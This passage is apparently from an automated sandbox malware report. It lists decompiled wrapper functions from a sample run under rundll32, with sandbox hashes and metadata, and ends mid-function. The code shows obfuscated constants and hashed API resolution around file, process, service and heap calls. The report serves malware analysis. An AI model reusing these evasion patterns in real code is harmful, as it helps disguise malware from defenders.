                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: OpenService
                                                                                                                                                            • String ID: X%v
                                                                                                                                                            • API String ID: 3098006287-3430654708
                                                                                                                                                            • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                                            • Instruction ID: 6c46207559fe28baa97599cef596c3f07856948e3ad7111aaea0ffde47a6c397
                                                                                                                                                            • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                                            • Instruction Fuzzy Hash: A30104B281120CFBDF16DFD4D9468DEBF79EB14314F148189F90566221D2729B609B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00378F65 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 260 378f65-379010 call 3820b9 call 38aa30 CreateFileW
                                                                                                                                                            C-Code - Quality: 35%
                                                                                                                                                            			E00378F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t38;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t32);
				_v28 = 0xee6fdc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x957ab3;
				_v12 = _v12 ^ 0x02d9a910;
				_v12 = _v12 + 0xffff8488;
				_v12 = _v12 ^ 0x02485b8e;
				_v8 = 0xf6b813;
				_v8 = _v8 + 0xffff9c70;
				_v8 = _v8 + 0xffff858c;
				_v8 = _v8 ^ 0x00f72129;
				E0038AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
				return _t38;
			}









                                                                                                                                                            0x00378f6d
                                                                                                                                                            0x00378f72
                                                                                                                                                            0x00378f73
                                                                                                                                                            0x00378f76
                                                                                                                                                            0x00378f79
                                                                                                                                                            0x00378f7c
                                                                                                                                                            0x00378f7f
                                                                                                                                                            0x00378f80
                                                                                                                                                            0x00378f83
                                                                                                                                                            0x00378f86
                                                                                                                                                            0x00378f8a
                                                                                                                                                            0x00378f8b
                                                                                                                                                            0x00378f90
                                                                                                                                                            0x00378f9f
                                                                                                                                                            0x00378faa
                                                                                                                                                            0x00378fb1
                                                                                                                                                            0x00378fb2
                                                                                                                                                            0x00378fb9
                                                                                                                                                            0x00378fc0
                                                                                                                                                            0x00378fc7
                                                                                                                                                            0x00378fce
                                                                                                                                                            0x00378fd5
                                                                                                                                                            0x00378fdc
                                                                                                                                                            0x00378fe3
                                                                                                                                                            0x00378ff0
                                                                                                                                                            0x00379009
                                                                                                                                                            0x00379010

                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00379009
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                                            • Instruction ID: 4ef644c63cb17270f9f96c97e70e737ff4730c415eded2b7f7e7ff7dfd550d8d
                                                                                                                                                            • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                                            • Instruction Fuzzy Hash: AD112B72900219FBCF229FE5DD098DFBFB5EF58354F118189F90862121C3328A61EB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00377F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 265 377f5d-377ff1 call 3820b9 call 38aa30 CreateProcessW
                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0037AD99,?,?,?,181C8C04,0037AD99), ref: 00377FEB
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction ID: 0e077f6d55c0fc79e9b05ece8147445b89fe0ba675fe17c1794b1ecc8317ded7
                                                                                                                                                            • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                                            • Instruction Fuzzy Hash: E011D672402118BBDF62AFD1DD09CDF7F79EF093A4F145144F91925121D2768A60EBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00374DDD Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 270 374ddd-374e73 call 3820b9 call 38aa30 SHFileOperationW
                                                                                                                                                            C-Code - Quality: 16%
                                                                                                                                                            			E00374DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				int _t38;
				signed int _t40;
				signed int _t44;
				struct _SHFILEOPSTRUCTW* _t45;

				_push(_a12);
				_t45 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003820B9(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x8324bd;
				_v20 = 0xe59c0f;
				_v12 = 0xfa6a5a;
				_v12 = _v12 | 0x6fcfbea7;
				_t40 = 0x1a;
				_push(0x3771311d);
				_push(_t40);
				_v12 = _v12 * 0x42;
				_v12 = _v12 ^ 0xdff430a4;
				_v8 = 0x460bc4;
				_v8 = _v8 | 0x3946640e;
				_push(0xdf0d4f1a);
				_v8 = _v8 / _t40;
				_v8 = _v8 + 0x2a2;
				_v8 = _v8 ^ 0x023f16a4;
				_t44 = 0x58;
				E0038AA30(_t44);
				_t38 = SHFileOperationW(_t45); // executed
				return _t38;
			}













                                                                                                                                                            0x00374de4
                                                                                                                                                            0x00374de7
                                                                                                                                                            0x00374de9
                                                                                                                                                            0x00374dec
                                                                                                                                                            0x00374def
                                                                                                                                                            0x00374df1
                                                                                                                                                            0x00374df6
                                                                                                                                                            0x00374dfd
                                                                                                                                                            0x00374e06
                                                                                                                                                            0x00374e0d
                                                                                                                                                            0x00374e14
                                                                                                                                                            0x00374e21
                                                                                                                                                            0x00374e22
                                                                                                                                                            0x00374e27
                                                                                                                                                            0x00374e28
                                                                                                                                                            0x00374e2b
                                                                                                                                                            0x00374e32
                                                                                                                                                            0x00374e39
                                                                                                                                                            0x00374e45
                                                                                                                                                            0x00374e4a
                                                                                                                                                            0x00374e4d
                                                                                                                                                            0x00374e54
                                                                                                                                                            0x00374e63
                                                                                                                                                            0x00374e64
                                                                                                                                                            0x00374e6d
                                                                                                                                                            0x00374e73

                                                                                                                                                            APIs
                                                                                                                                                            • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00374E6D
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileOperation
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3080627654-0
                                                                                                                                                            • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                                            • Instruction ID: cf16629af539a33616f49a21373d06cf94cb9efecc183c86d9babfdf080eddca
                                                                                                                                                            • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                                            • Instruction Fuzzy Hash: C10139B5E01209FBDB14EFA4D9469DEBFB4EF80318F10C089E904AA251D3744B549B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00375DDD Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E00375DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;
				void* _t31;
				void* _t33;
				intOrPtr _t34;

				_t31 = __edx;
				_t34 = __ecx;
				E003820B9(_t21);
				_v12 = 0x9fac18;
				_v12 = _v12 ^ 0x90454497;
				_v12 = _v12 ^ 0x90d3245f;
				_v8 = 0x647eb;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xffff0b9f;
				_v8 = _v8 ^ 0xfff54d3d;
				_t25 = E0038AA30(0x2d1, 0x9df7cc0d, __ecx, 0x5aaf08f1);
				_t26 =  *_t25(_t31, 0, _t34, 0x28, __ecx, __edx, _a4, _a8, 0, _a16, _a20, 0x28, _t30, _t33, __ecx, __ecx); // executed
				return _t26;
			}












                                                                                                                                                            0x00375de9
                                                                                                                                                            0x00375deb
                                                                                                                                                            0x00375dfa
                                                                                                                                                            0x00375dff
                                                                                                                                                            0x00375e09
                                                                                                                                                            0x00375e15
                                                                                                                                                            0x00375e1c
                                                                                                                                                            0x00375e23
                                                                                                                                                            0x00375e27
                                                                                                                                                            0x00375e2b
                                                                                                                                                            0x00375e32
                                                                                                                                                            0x00375e4a
                                                                                                                                                            0x00375e58
                                                                                                                                                            0x00375e5f

                                                                                                                                                            APIs
                                                                                                                                                            • SetFileInformationByHandle.KERNEL32(65528FD4,00000000,?,00000028), ref: 00375E58
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileHandleInformation
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3935143524-0
                                                                                                                                                            • Opcode ID: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                                            • Instruction ID: 9e4cb6cc1c812524f59df03c18050d80ee30f982738ed4ed13abd5011f3902e9
                                                                                                                                                            • Opcode Fuzzy Hash: 1342c75f1a0eb519f77f2bc21feb826310fd141c5a5d19468efb3ead449ac199
                                                                                                                                                            • Instruction Fuzzy Hash: 5001BC76901308BBDB24DED0CC0AEEEBF74EF95314F108089F50466250D3B05B109BA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00371E22 Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 280 371e22-371ea6 call 3820b9 call 38aa30 RtlAllocateHeap
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E00371E22(long __ecx, void* __edx, long _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t42;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t42 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t27);
				_v12 = 0x309d17;
				_v12 = _v12 | 0x1b560655;
				_v12 = _v12 ^ 0x1b78328a;
				_v8 = 0xa187d;
				_v8 = _v8 + 0xa972;
				_t36 = 0x67;
				_v8 = _v8 / _t36;
				_v8 = _v8 << 7;
				_v8 = _v8 ^ 0x000b519a;
				E0038AA30(0x1c2, 0x9df7cc0d, _t36, 0x8eab3015);
				_t34 = RtlAllocateHeap(_a8, _t42, _a4); // executed
				return _t34;
			}









                                                                                                                                                            0x00371e25
                                                                                                                                                            0x00371e26
                                                                                                                                                            0x00371e28
                                                                                                                                                            0x00371e2b
                                                                                                                                                            0x00371e2d
                                                                                                                                                            0x00371e30
                                                                                                                                                            0x00371e33
                                                                                                                                                            0x00371e37
                                                                                                                                                            0x00371e38
                                                                                                                                                            0x00371e3d
                                                                                                                                                            0x00371e47
                                                                                                                                                            0x00371e50
                                                                                                                                                            0x00371e57
                                                                                                                                                            0x00371e5e
                                                                                                                                                            0x00371e6a
                                                                                                                                                            0x00371e72
                                                                                                                                                            0x00371e7a
                                                                                                                                                            0x00371e7e
                                                                                                                                                            0x00371e91
                                                                                                                                                            0x00371ea0
                                                                                                                                                            0x00371ea6

                                                                                                                                                            APIs
                                                                                                                                                            • RtlAllocateHeap.NTDLL(AF136809,000C892D,1B78328A,?,?,?,003780DB,?,00000000,AF136809), ref: 00371EA0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                            • Opcode ID: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                                            • Instruction ID: b6be7ddf827da8a450fb84b786cca6038db036a2a8913b930a5e4fac4bfa0276
                                                                                                                                                            • Opcode Fuzzy Hash: 17d2fe5eb58d72b3578096db544abd1a3df4a71cc1238501c62d01f2d4a045a2
                                                                                                                                                            • Instruction Fuzzy Hash: 60010476901208FBEB05DFD4DD4A8DE7BB5EB45354F208099F9086A211E7B29F20AB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003846BB Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 285 3846bb-38473b call 3820b9 call 38aa30 SHGetFolderPathW
                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                            			E003846BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t21;
				intOrPtr* _t25;
				void* _t26;

				E003820B9(_t21);
				_v20 = 0x3f5bb0;
				_v16 = 0;
				_v12 = 0x996874;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0xb43bad9d;
				_v8 = 0xebf0af;
				_v8 = _v8 ^ 0x3b7dcb24;
				_v8 = _v8 ^ 0x3b96d1fd;
				_t25 = E0038AA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
				return _t26;
			}










                                                                                                                                                            0x003846d5
                                                                                                                                                            0x003846da
                                                                                                                                                            0x003846e4
                                                                                                                                                            0x003846ec
                                                                                                                                                            0x003846f3
                                                                                                                                                            0x003846f7
                                                                                                                                                            0x003846fe
                                                                                                                                                            0x00384705
                                                                                                                                                            0x0038470c
                                                                                                                                                            0x00384724
                                                                                                                                                            0x00384735
                                                                                                                                                            0x0038473b

                                                                                                                                                            APIs
                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 00384735
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FolderPath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1514166925-0
                                                                                                                                                            • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction ID: 09782a1b4ea3e555b4518fdc90f4ed0ac16dda0e58b05b4e3be04706e9bb403c
                                                                                                                                                            • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                                            • Instruction Fuzzy Hash: AF01EC75801218BBCF15AFD5DC498DFBFB8EF45394F108185F91866211D2758A60DBD1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 003793ED Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 73%
                                                                                                                                                            			E003793ED() {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _t24;

				_v28 = 0xda6c64;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x88a564;
				_v12 = _v12 | 0x9bf5ed5c;
				_v12 = _v12 ^ 0x9bf17c37;
				_v8 = 0xd9241f;
				_v8 = _v8 * 0x5c;
				_v8 = _v8 + 0xccdd;
				_v8 = _v8 + 0x903;
				_v8 = _v8 ^ 0x4e0c4bb2;
				E0038AA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
				ExitProcess(0);
			}








                                                                                                                                                            0x003793f3
                                                                                                                                                            0x00379405
                                                                                                                                                            0x00379411
                                                                                                                                                            0x00379412
                                                                                                                                                            0x00379413
                                                                                                                                                            0x0037941a
                                                                                                                                                            0x00379421
                                                                                                                                                            0x00379428
                                                                                                                                                            0x00379433
                                                                                                                                                            0x00379436
                                                                                                                                                            0x0037943d
                                                                                                                                                            0x00379444
                                                                                                                                                            0x00379451
                                                                                                                                                            0x0037945b

                                                                                                                                                            APIs
                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 0037945B
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 621844428-0
                                                                                                                                                            • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction ID: 60a4d0680975cbf6830732f16911f82c1889d872f7ced8ab84c472361a29988a
                                                                                                                                                            • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                                            • Instruction Fuzzy Hash: CEF03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9DA04B7261E7745F459B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00388F9E Relevance: 1.5, APIs: 1, Instructions: 31serviceCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 55%
                                                                                                                                                            			E00388F9E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				unsigned int _v12;
				void* _t19;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t19);
				_v12 = 0xd87912;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0006adfb;
				_v8 = 0xf5ad8e;
				_v8 = _v8 + 0xc481;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x00032ff7;
				E0038AA30(0x26e, 0x20a9b263, __ecx, 0x37d4b579);
				_t24 = CloseServiceHandle(_a12); // executed
				return _t24;
			}







                                                                                                                                                            0x00388fa1
                                                                                                                                                            0x00388fa2
                                                                                                                                                            0x00388fa3
                                                                                                                                                            0x00388fa6
                                                                                                                                                            0x00388fa9
                                                                                                                                                            0x00388fad
                                                                                                                                                            0x00388fae
                                                                                                                                                            0x00388fb3
                                                                                                                                                            0x00388fbd
                                                                                                                                                            0x00388fc6
                                                                                                                                                            0x00388fcd
                                                                                                                                                            0x00388fd4
                                                                                                                                                            0x00388fdb
                                                                                                                                                            0x00388fdf
                                                                                                                                                            0x00388ff7
                                                                                                                                                            0x00389002
                                                                                                                                                            0x00389007

                                                                                                                                                            APIs
                                                                                                                                                            • CloseServiceHandle.ADVAPI32(33E0711C), ref: 00389002
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseHandleService
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1725840886-0
                                                                                                                                                            • Opcode ID: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                                            • Instruction ID: 91a8512992be115e742bfc980f6b6b1a51d04d6aae2e4160e8445efda78c8be0
                                                                                                                                                            • Opcode Fuzzy Hash: 7721f494cb045c1adf2975ecc10c8ea825fd6ee4babf1da4d00f55aede024231
                                                                                                                                                            • Instruction Fuzzy Hash: 91F049B191020CFFDF06AFD4C94A89EBBB4EB10308F208198F80566611D6769B64EF51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00381F8A Relevance: 1.5, APIs: 1, Instructions: 31fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 68%
                                                                                                                                                            			E00381F8A(intOrPtr __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				int _t25;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t19);
				_v12 = 0x96b134;
				_v12 = _v12 + 0xdeb4;
				_v12 = _v12 | 0x0c5d8169;
				_v12 = _v12 ^ 0x0cdc4dba;
				_v8 = 0xf8ae2a;
				_v8 = _v8 + 0xcab3;
				_v8 = _v8 * 0x2b;
				_v8 = _v8 ^ 0x29e0cf29;
				E0038AA30(0x112, 0x9df7cc0d, __ecx, 0x6fe24f6c);
				_t25 = DeleteFileW(_a4); // executed
				return _t25;
			}







                                                                                                                                                            0x00381f8d
                                                                                                                                                            0x00381f8e
                                                                                                                                                            0x00381f8f
                                                                                                                                                            0x00381f93
                                                                                                                                                            0x00381f94
                                                                                                                                                            0x00381f99
                                                                                                                                                            0x00381fa3
                                                                                                                                                            0x00381faf
                                                                                                                                                            0x00381fb6
                                                                                                                                                            0x00381fbd
                                                                                                                                                            0x00381fc4
                                                                                                                                                            0x00381fda
                                                                                                                                                            0x00381fdd
                                                                                                                                                            0x00381fea
                                                                                                                                                            0x00381ff5
                                                                                                                                                            0x00381ffa

                                                                                                                                                            APIs
                                                                                                                                                            • DeleteFileW.KERNEL32(0CDC4DBA,?,?,?,?), ref: 00381FF5
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000000A.00000002.528987636.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 0000000A.00000002.528978454.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000000A.00000002.529013480.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_10_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4033686569-0
                                                                                                                                                            • Opcode ID: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                                            • Instruction ID: c650afb2f802a11bdb76b0f47907f5372ec508b12910bfda7ae09b34d41f6f53
                                                                                                                                                            • Opcode Fuzzy Hash: d9141e2dac26f15b35629e5f1bbea3b611062587ec9c1243f53570606ca8c40c
                                                                                                                                                            • Instruction Fuzzy Hash: 8EF0F9B190120CFBEF18EFD4D9468AEBFB5EB50304F20819AF40467222E7715F549B91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00385BFD Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                            			E00385BFD(intOrPtr __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t20;
				struct HINSTANCE__* _t25;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t20);
				_v16 = _v16 & 0x00000000;
